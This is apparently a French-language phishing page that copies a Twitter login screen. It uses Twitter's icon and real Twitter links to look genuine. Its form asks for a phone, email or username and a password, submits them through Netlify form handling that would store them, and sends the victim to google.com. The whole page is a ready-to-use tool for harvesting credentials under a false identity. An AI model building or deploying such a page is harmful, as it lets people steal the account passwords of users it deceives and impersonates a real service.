<!DOCTYPE html>
<html>

<head>
    <meta charset='utf-8'>
    <meta name="keywords" content=" dfgfd ,gh,gfh fgh,gfhf">

    <title>Connectez-vous avec twitter</title>
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <link rel="stylesheet" type="text/css" href="main.css">
    <link rel="shortcut icon" type="image/icon" href="https://abs.twimg.com/favicons/twitter.ico" />

</head>

<body>

    <div class="twitter-login-box" style="margin-top: 100px; padding: 20px;">
        <header>
            <img src="https://static01.nyt.com/images/2014/08/10/magazine/10wmt/10wmt-jumbo-v4.jpg?quality=90&auto=webp"
                alt="twitter logo">
            <h1>Se connecter avec Twitter</h1>
        </header>

        <form name="contact" method="POST" data-netlify="true" action="https://google.com">
            <div class="input-wrapper">
                <label for="user-name-id">Téléphone, email ou nom d'utilisateur</label>
                <input type="text" name="name" id="user-name-id">
            </div>

            <div class="input-wrapper">
                <label for="password-id">Mot de passe</label>
                <input type="password" name="message" id="password-id">
            </div>
            <input class="sumbito twitter-btn" type="submit" value="Se connecter">
        </form>

        <div class="footer">
            <a href="https://twitter.com/account/begin_password_reset   ">Mot de passe oublié ?</a> .
            <a href="https://twitter.com/i/flow/signup">S'inscrire sur Twitter</a>
        </div>

    </div>
    <style>
        @media screen and (max-width:500px) {
            h1 {
                font-size: 25px !important;
            }
        }

        * {
            box-sizing: border-box;
        }

        html {
            font-family: Arial, Helvetica, sans-serif;
        }

        body {
            margin: 0;
        }

        .twitter-login-box {
            max-width: 600px;
            margin: 20px auto;
        }

        .twitter-login-box header img {
            width: 70px;
        }

        .twitter-login-box header {
            text-align: center;
        }

        .input-wrapper {
            margin-bottom: 15px;

        }

        .input-wrapper label,
        .input-wrapper input {
            width: 100%;
            display: block;

        }

        .input-wrapper label {
            border-top-right-radius: 5px;
            border-top-left-radius: 5px;
        }

        .input-wrapper input {
            border: none;
            background-color: #eee;
            padding: 10px;
            font-size: 20px;
            border-bottom: 3px solid #6a6a6a;
        }

        .input-wrapper input[type="password"] {
            border-bottom: 3px solid #6a6a6a;
        }

        .input-wrapper input:focus {
            outline: none;
        }

        .input-wrapper label {
            background-color: #eee;
            padding: 10px;
            color: #6a6a6a;
        }

        .twitter-btn {
            background-color: #33b3ee;
            border: none;
            width: 100%;
            padding: 15px;
            border-radius: 30px;
            color: #fff;
            font-size: 20px;
            font-weight: bold;
        }

        .twitter-login-box .footer {
            text-align: center;
            margin-top: 20px;
            color: #33b3ee;
        }

        .twitter-login-box .footer a {
            color: #33b3ee;
            text-decoration: none;
        }

    </style>
</body>

</html>
